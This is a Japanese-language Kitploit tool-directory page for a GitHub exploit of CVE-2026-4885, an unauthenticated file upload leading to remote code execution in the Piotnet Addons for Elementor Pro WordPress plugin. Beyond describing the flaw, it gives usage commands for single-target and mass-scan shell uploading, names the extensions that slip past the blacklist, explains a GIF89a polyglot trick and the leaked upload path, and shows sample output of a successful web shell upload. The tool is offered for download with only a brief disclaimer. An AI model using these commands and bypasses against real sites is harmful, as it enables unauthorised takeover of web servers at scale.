Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-4885 — Piotnet Addons for Elementor Pro <= 7.1.70 - 認証なし任意ファイルアップロード → RCE | Kitploit
ツール/GitHubGitHub/xshadow-here/cve-2026-4885
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ペイロード開発
GitHubxshadow-here/cve-2026-4885

CVE-2026-4885

Piotnet Addons for Elementor Pro <= 7.1.70 - 認証なし任意ファイルアップロード → RCE

リポジトリを見る
13ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-4885

Piotnet Addons for Elementor Pro <= 7.1.70 - 未認証の任意ファイルアップロード → RCE


説明 :

WordPress用プラグイン Piotnet Addons for Elementor Pro は、pafe_ajax_form_builder 関数においてバージョン 7.1.70 までの全バージョンでファイルタイプのバリデーションが欠如しているため、任意ファイルアップロードの脆弱性があります。このプラグインは 不完全な拡張子ブラックリスト を使用しており、php、phpt、php5、php7、exe 拡張子のみをブロックし、.phar や .phtml などの危険な拡張子は自由にアップロードできてしまいます。

これにより、未認証の攻撃者 が対象サイトのサーバー上に任意のPHPファイルをアップロードし、リモートコード実行(RCE) を引き起こすことが可能になります。

注: この脆弱性を悪用するには、Piotnetフォームにファイルフィールドが追加されている必要があります。


情報 : CVE-2026-4885

~ CVSSスコア : 9.8 (クリティカル)

~ CVSSベクトル : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

~ 影響を受けるバージョン : <= 7.1.70

~ パッチ : 利用可能なパッチなし

~ 公開日 : May 18, 2026

  • 研究者 : Wannes Verwimp
  • PoC作成者 : Shadow & Friska 🩷

根本原因 :

pafe_ajax_form_builder AJAXハンドラーは、適切なバリデーションを行わずにファイルアップロードを受け入れます。

root@kitploit:~
// 不完全なブラックリスト — ブロックするのは次のもののみ:
$blocked = ['php', 'phpt', 'php5', 'php7', 'exe'];

// .phtml、.phar、.shtml などは自由に通過します ✓

アップロードパスは、未認証の pafe_export_database AJAXアクション経由で漏洩する可能性があります → CSVエクスポートに完全なファイルURLが含まれます。


使用方法 :

対話型メニュー(デフォルト):

root@kitploit:~
python3 shadow.py
root@kitploit:~
  ╾────  MENU  ────╼

  1  ▶  one target
  2  ▶  mass scan
  3  ▶  exit

  [1/2/3] :

単一ターゲット(CLI):

root@kitploit:~
python3 shadow.py -u https://target.com
python3 shadow.py -u https://target.com -s shell.phtml

複数ターゲット(CLI):

root@kitploit:~
python3 shadow.py -f targets.txt -t 20
python3 shadow.py -f targets.txt -t 20 -s shell.phtml

オプション :

root@kitploit:~
-u, --url       ターゲットURL
-f, --file       ターゲットURLのファイル(1行につき1つ)
-s, --shell      カスタムPHPシェルファイル(GIF89a自動付加)
-t, --threads   マスモードの同時スレッド数(デフォルト: 5)
-h, --help      ヘルプを表示

機能 :

  • 🩷 完全対話型メニュー(単一ターゲット / マススキャン)
  • ⚡ 非同期並列偵察 — ページを同時にクロール
  • 🔍 ページHTMLから form_id、post_id、field_name の自動検出
  • 🪄 GIF89aポリグロットマジックバイト — 画像タイプチェックを回避
  • 📡 pafe_export_database 経由のURL漏洩(認証不要、nonce不要)
  • 🎯 シェルアップロードの検証(HTTP 200 + PHP実行チェック)
  • 💾 結果を自動保存(shell.txt)
  • 🌐 設定可能なスレッド数 + 非同期セマフォによるマスモード
  • ⚠️ アップロードプロンプト前にブロックされた拡張子の警告表示

シェル :

シェルファイルをローカルで準備します(例: shadow.phtml)— GIF89aマジックバイトは不足している場合 自動的に付加されます。

ブロックされる拡張子: .php .phpt .php5 .php7 .exe

代わりに使用する拡張子: .phtml .phar .shtml .php8 など


出力例 :

root@kitploit:~
╔══════════════════════════════════════════════════════════╗
║                                                          ║
║  ♡  CVE-2026-4885                                        ║
║  Piotnet Addons for Elementor Pro  <=  7.1.70            ║
║  Unauthenticated File Upload  →  RCE                     ║
║                                                          ║
║  by Shadow & Friska  ♡                                   ║
║                                                          ║
╚══════════════════════════════════════════════════════════╝

  ╾────  VERSION  ────╼
  ♡  v7.1.67 <= 7.1.70  —  VULNERABLE

  ╾────  RECON  ────╼
  ◆  scanning 46 pages (parallel)...
  ♡  [PIOTNET]  https://target.com/contact
               post_id=9  |  form_id=72071c0
  ◆  using   : https://target.com/contact

  ╾────  EXPLOIT  ────╼
  ◆  post_id=9  |  form_id=72071c0  |  field=file
  ▶  trying .phtml ...
  ♡  uploaded  (.phtml)
  ♡  URL leak  : https://target.com/wp-content/uploads/piotnet-addons-for-elementor/shadow-xxx.phtml

  ╔══════════════════════════════════════════════════════════╗
  ║  ★  SHELL UPLOADED  (.phtml)                            ║
  ║                                                          ║
  ║  ◆  shell  : https://target.com/wp-content/...          ║
  ╚══════════════════════════════════════════════════════════╝

必要条件 :

root@kitploit:~
pip install httpx

免責事項 :

このツールは教育目的および許可されたセキュリティテスト目的のみのものです。

自分が所有していない、または明示的なテスト許可を得ていないシステムに対する不正使用は違法です。作成者は、このツールの誤用やそれによって生じた損害について一切の責任を負いません。

ツールをダウンロード